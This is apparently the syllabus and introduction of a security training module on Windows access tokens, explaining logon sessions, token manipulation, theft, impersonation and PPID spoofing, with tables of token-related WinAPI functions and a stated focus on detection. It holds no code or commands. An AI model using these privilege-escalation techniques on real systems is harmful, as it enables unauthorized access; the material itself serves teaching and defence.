Summary
This module is centered on understanding access tokens, and the attacks based on access tokens, such as Access Token Manipulation, Access Token Theft, Token impersonation, etc. Additionally, participants will gain hands-on experience in using WinDbg and other tools to analyze processes, tokens, and security descriptors, and monitoring of WINAPI functions.
This module is broken down into sections with accompanying hands-on exercises to practice each of the techniques we cover. The module ends with a practical hands-on skills assessment to gauge your understanding of the various topic areas.
-
Introduction
-
Intro to Toolset
-
Windows Logon Process
-
Process Internals and Protection
-
Understanding Access Tokens
-
Important Token Structures
-
Access Checks
-
Token Privileges
-
Token Enumeration
-
Token Manipulation
-
Token Theft (T1134.001)
-
Token Impersonation
-
Make Access Tokens
-
Network Authentication
-
PPID Spoofing using Access Token
-
Detections Opportunities
Students will also gain insight into the inner workings of access tokens, process creation, parent process PID spoofing, and the importance of access control lists (ACLs) and security descriptors in securing system resources. Furthermore, the module covers the techniques used to create new tokens from user credentials, ways to duplicate tokens, creating new processes with stolen tokens, and token impersonation.
There are also some useful scenarios covered in the module, such as the demonstration and detection of token manipulation, escalation to "NT AUTHORITY\SYSTEM
", and scenarios demonstrating how kernel drivers detect attacks such as PPID spoofing. As you work through the module, you will see example commands and command output for the various topics introduced. It is worth reproducing as many of these examples as possible to further reinforce the concepts introduced in each section. You can do this in the Pwnbox provided in the interactive sections or on your own virtual machine.
You can start and stop the module at any time and pick up where you left off. There is no time limit or "grading," but you must complete all of the exercises and the skills assessment to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.
The module is classified as "Hard" because there is a certain requirement for working knowledge of using debuggers, analysis tools, and an understanding of the Windows command line.
A firm grasp of the following modules can be considered a prerequisites for successful completion of this module:
- Introduction to Windows Command Line
- Introduction to Malware Analysis
- Intro to Assembly Language
- Basic understanding of C
Introduction
Authentication and authorization are foundational concepts that address two fundamental questions in security:
-
Authentication (Is the entity who it claims to be?)
: Authentication ensures that the identity of a user, system, or service is genuine. This verification is typically carried out using methods such as passwords, biometrics, or digital certificates. Authentication acts as the initial checkpoint for establishing trust between entities. -
Authorization (What is the entity allowed to do?)
: Once authentication is successful, authorization defines the scope of actions or resources the entity is permitted to access. It enforces access controls to ensure that users, applications, or systems operate within their designated permissions.
In Windows environments, authentication and authorization are structured around security principals. These principals represent entities capable of initiating actions or requests and include: users, computers, groups and services. To implement authentication and authorization, Windows relies on two key mechanisms, logon sessions
and access tokens
.
-
Logon Session
: A logon session is created whenever a user successfully signs in to a system. This session uniquely identifies the authenticated user and their session-specific details. For example, when a user logs in, a logon session is established to track their identity and authentication data. -
Access Token
: After the authentication process, Windows generates an access token, which serves as thesecurity context
for the user’s processes and threads. This token contains essential details, such as:- The user’s unique identifier (SID)
- Membership in security groups
- Assigned privileges
- Integrity levels and associated claims
Access tokens are associated with processes or threads and govern what resources they can access and the actions they can execute. A deeper understanding of tokens is essential for understanding access token manipulation
. According to MITRE, Access Token Manipulation (T1134) falls under the Privilege Escalation (TA0004) and Defense Evasion (TA0005) tactics. This involves an adversary manipulating access tokens to bypass access controls and gain unauthorized access to resources within a system or network.
![](/storage/modules/256/at-mitre_.png)
Access Token Manipulation Techniques
The diagram below shows some common access token manipulation scenarios, which include how an access token is stolen from a target process and how an access token is created using stolen credentials. Once the access token is obtained, it can be used to perform further actions (such as PPID Spoofing (T1134.004)). The access token manipulation techniques shown in the diagram below are:
-
Token Privilege Modification
-
Create Process with Token
-
Token Impersonation
This module presents a comprehensive analysis of access token manipulation techniques used by attackers and provides guidance on detecting these threats.
Access token manipulation is a prevalent strategy used by adversaries to escalate privileges and avoid detection in Windows environments. The MITRE ATT&CK page for Access Token Manipulation (T1134.004) provides detailed information in the Procedure Examples
section on how various threat actors execute related techniques.
![](/storage/modules/256/procedure.png)
For instance, the screenshot above demonstrates how adversaries manipulate an access token and enable specific privileges, such as SeDebugPrivilege
. This privilege allows the debugging or manipulation of processes owned by other users, including those running with elevated privileges.
We can also observe that the AdjustTokenPrivileges() WINAPI function is utilized. This function allows a process to adjust the privileges of an access token. Adversaries can exploit this to enable privileges that are typically disabled (such as SeDebugPrivilege
), thereby escalating their privileges to carry out malicious actions.
![](/storage/modules/256/examples.png)
There are also attempts to escalate privileges to NT Authority\SYSTEM
, which is the highest privilege level on a Windows system, equivalent to the root
or superuser
on Unix-based systems. Adversaries often target this privilege level to gain full control over a compromised system.
![](/storage/modules/256/example1.png)
Adversaries have also employed access token manipulation techniques to create new tokens from stolen credentials. They have used impersonation to access resources or perform actions that require higher privileges than those of the current user. This technique involves a thread assuming the identity of another user or security principal, typically to perform actions on their behalf. The screenshot below provides examples of various software/groups that have utilized this technique in real-world attacks.
![](/storage/modules/256/example2.png)
API Functions Related to Access Tokens
API functions related to access tokens allow applications to manage and manipulate these tokens, enabling scenarios like impersonation, privilege elevation, and security checks. Some key API functions related to access tokens are categorized as follows:
Token Creation
These functions are used to create or duplicate tokens:
Function Name | Description |
---|---|
OpenProcessToken |
Opens the access token associated with a process. |
OpenThreadToken |
Opens the access token associated with a thread. |
DuplicateToken |
Duplicates an existing access token, creating a new token with the same properties. |
DuplicateTokenEx |
Duplicates an access token and allows you to specify properties like the desired security level and token type. |
CreateRestrictedToken |
Creates a restricted token by removing privileges or restricting access to specific SIDs. |
Token Manipulation
These functions modify or adjust the properties and privileges of tokens:
Function Name | Description |
---|---|
AdjustTokenPrivileges |
Enables or disables privileges in a token. |
AdjustTokenGroups |
Modifies the group memberships in a token. |
SetTokenInformation |
Changes properties of a token, such as default DACL or session ID. |
Token Query
These functions retrieve information about a token:
Function Name | Description |
---|---|
GetTokenInformation |
Retrieves information about a token, such as privileges, owner, or groups. |
CheckTokenMembership |
Checks whether a token includes a specific SID in its groups. |
IsTokenRestricted |
Determines if a token is a restricted token. |
Token Impersonation
These functions allow threads or processes to impersonate other security contexts:
Function Name | Description |
---|---|
ImpersonateLoggedOnUser |
Allows a thread to impersonate the security context of a logged-on user. |
ImpersonateSelf |
Enables a thread to impersonate itself for certain operations. |
RevertToSelf |
Ends impersonation, reverting the thread back to its original security context. |
Miscellaneous
Other important functions related to tokens:
Function Name | Description |
---|---|
LogonUser |
Authenticates a user and returns a token that represents the user. |
CreateProcessAsUser |
Creates a new process using the security context of a specific token. |
CreateProcessWithTokenW |
Similar to CreateProcessAsUser, but explicitly requires a token handle. |
SetThreadToken |
Assigns a token to a thread for impersonation purposes. |
Please refer to this Microsoft documentation to get more details on access tokens and WinAPI functions.
Moving On
To understand access tokens and the attack techniques based on them, we'll go through the fundamental concepts related to processes and tokens, explore different ways to create processes, and then examine the attack scenarios and respective detection opportunities in the following sections. In the upcoming section, we'll cover some basic concepts of WinDbg, debuggers, disassemblers, and other tools used throughout this module.